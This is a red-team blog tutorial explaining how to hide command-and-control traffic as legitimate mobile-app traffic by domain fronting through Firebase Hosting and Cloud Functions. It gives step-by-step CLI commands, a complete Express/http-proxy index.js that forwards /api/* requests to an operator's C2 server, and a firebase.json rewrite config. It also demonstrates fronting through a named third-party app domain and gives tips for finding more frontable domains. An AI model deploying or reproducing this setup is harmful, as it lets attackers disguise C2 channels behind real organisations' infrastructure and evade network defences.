> For the complete documentation index, see [llms.txt](https://www.redteam.cafe/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.redteam.cafe/red-team/domain-front/firebase-domain-front-hiding-c2-as-app-traffic.md).

# Firebase Domain Front - Hiding C2 as App traffic

We often see that large organization use firebase for hosting their applications and database. Firebase has a lot of features such as real-time database, hosting, cloud functions, hosting etc. Today we are going to talk about firebase hosting and cloud functions which are used by a lot of mobile applications these days. In our recent project, we were able to hide ourselves as a legit mobile traffic and bypass a lot of traffic filters

## Firebase Cloud Functions

![Firebase Cloud Functions](/files/-MScA4drWg-ISb1WQSZZ)

Firebase allows an operator to write an applications in Node JS and deploy it using its hosting feature.&#x20;

## Setting up Firebase Domain Front

So lets start by selecting a app hosted using firebase. In the following case we'll take <https://go.auk.eco>/ as our selected app.

#### Step 1: Create an account on <https://firebase.google.com>

#### Step 2: Go to Console

![Go to Console in Top Right Corner](/files/-MScBBm9GJPklTku60fi)

#### Step 3: Create a project and give it a name

![Create Firebase Project](/files/-MScEuDeLMYIR7Zwa0PU)

![Set up a project name](/files/-MScFUaFdxg4rtzlt9T5)

![Create a Project](/files/-MScFrIT8vH02s51IZMO)

#### Step 4: Open your command prompt and install firebase cli.&#x20;

```
npm install -g firebase-tools
```

#### Step 5: Make a folder and perform firebase cli login.&#x20;

```
mkdir awesomedomainfront
cd awesomedomainfront
firebase login
```

#### Step 6:  Initiate Hosting

```
firebase init hosting
```

Once you hit the above command you'll be presented with many options. See the following screenshot for responses to the options

![Firebase Hosting Init](/files/-MScIFw0ZD-qVYDLfKIs)

#### Step 7: Initiate Cloud functions

```
firebase init functions
```

Again you'll be presented with many options. See the following screenshot for the response to the options

![Firebase Functions init](/files/-MScIuz8yvM6shNp1aAT)

#### Step 8: Install Express and http-proxy

```
cd functions
npm i express --save
npm i http-proxy --save
```

![Install Express and http-proxy](/files/-MScJvDDwUoody6vz4B2)

#### Step 9: Edit the index.js

Since you are already in the functions folder after saving the npm packages. Lets edit the index.js file in this folder.

{% code title="index.js" %}

```javascript
const functions = require('firebase-functions');
const express = require('express');

const app = express();

var http = require('http'), httpProxy = require('http-proxy');


var proxy = httpProxy.createProxyServer({secure:false,xfwd:true}); //Setting up X-forwarded for header 

// your C2 must have a URI . In this case I am using /api/" 
app.all('/api/*', function(req, res, next){
    console.log(req.url);
    req.url = "/api/" + req.url.slice(5);
	console.log("Req URL:"+req.url);
    proxy.web(req, res, {
        target: 'https://firebase.redteam.cafe:443/' /* Change it to your domain */
    }, function(e) {
        console.log(e);
    }); 
	res.set('Cache-Control', 'no-cache, no-store');
});


exports.app = functions.https.onRequest(app);

// // Create and Deploy Your First Cloud Functions
// // https://firebase.google.com/docs/functions/write-firebase-functions
//
// exports.helloWorld = functions.https.onRequest((request, response) => {
//   functions.logger.info("Hello logs!", {structuredData: true});
//   response.send("Hello from Firebase!");
// });

```

{% endcode %}

#### Step 10: Edit the firebase.json file

Go to the parent folder and edit firebase.json

```javascript
cd ../
```

{% code title="firebase.json" %}

```javascript
{
  "hosting": {
	"headers" : [{
		"source" : "**/*.@(js)",
		"headers": [{
			"key" : "Cache-Control",
			"value" : "no-cache, no-store"
			}]
		}],
    "public": "public",
	"rewrites": [{
	/* your C2 must have a URI . In this case I am using /api/" */
		"source": "/api/**",
		"function": "app",
		"run":{
			"region" : "asia-east2"
			}
		}],
    "ignore": [
      "firebase.json",
      "**/.*",
      "**/node_modules/**"
    ]
  },
  "functions": {
  }
}

```

{% endcode %}

#### Step 11: Deploy the project

Lets start the deployment of our firebase project

```javascript
firebase deploy
```

![Error Message for deploying the project](/files/-MScXKCtY79puvslwWp5)

Modify the plan of project from free plan to Pay as you go plan

![Click Modify Plan](/files/-MScYK2ZpMO3S_C0qsaA)

![Select "Pay as you go" plan](/files/-MScZ6AhirqLtYGSfsdP)

Now lets try the deployment again.

```javascript
firebase deploy
```

![Deploy Complete](/files/-MSc_wPTPpQRpdmr-aDO)

#### Final Tests for the Domain Front

Lets check what's hosted on <https://firebase.redteam.cafe/api/index.html>

![Response from firebase.redteam.cafe](/files/-MScWdB94gt3hhO5wHmV)

Let's check if our app works fine&#x20;

![Response from amazingdomainfront.web.app](/files/-MScnEEo-xFqTHKO6JCJ)

### THE FINAL TEST

Lets see if we are able to do **Domain Front against a test domain** <https://go.auk.eco>/

![Domain front with Test Domain is Successful](/files/-MScphoKab_PHORnOA12)

#### How to Find more domain fronts

Hint: Try to find domains whose CNAME ends with \*.web.app&#x20;

**UPDATE (4/5/2021) : Vincent Yiu created a list for domain fronts in the following github repo**

<https://github.com/vysecurity/DomainFrontingLists>

## Download Source Code&#x20;

Source code can be downloaded from my github repository <https://github.com/shantanu561993/Awesome_Firebase_DomainFront>

## Credits

[Vincent Yiu](https://twitter.com/vysecurity), [Jonathan Cheung](https://www.linkedin.com/in/jonathan-cheung-0a8208138/)

### Connect with me

Twitter: <https://twitter.com/shantanukhande>
